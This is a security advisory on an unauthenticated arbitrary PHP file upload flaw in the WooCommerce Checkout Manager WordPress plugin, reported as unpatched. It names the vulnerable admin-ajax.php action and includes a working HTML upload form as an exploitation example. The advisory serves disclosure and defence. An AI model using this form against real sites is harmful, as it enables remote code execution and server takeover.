SB2019042601 - Unrestricted file upload in WooCommerce Checkout Manager
Published: April 26, 2019
Security Bulletin ID
SB2019042601
Severity
High
Patch available
NO
Number of vulnerabilities
1
Exploitation vector
Remote access
Highest impact
Code execution
Breakdown by Severity
- Low
- Medium
- High
- Critical
Description
This security bulletin contains information about 1 security vulnerability.
1) Arbitrary file upload (CVE-ID: N/A)
The vulnerability allows a remote attacker to compromise vulnerable application.
The vulnerability exists due to missing restrictions when uploading PHP files via the "/wp-admin/admin-ajax.php" URL, when action is set to "wccs_upload_file_func" and valid "order_id" identifier is set. A remote non-authenticated attacker can upload and execute arbitrary PHP file on the server.
Exploitation example:
<html> <body> <form action="http://[host]/wp-admin/admin-ajax.php?action=wccs_upload_file_func&order_id=[order ID]&name=test" method="POST" enctype="multipart/form-data"> <input type="file" name="test[1]" /> <input type="submit" value="Submit" /> </form> </body> </html>
Remediation
Cybersecurity Help is not aware of any official remediation provided by the vendor.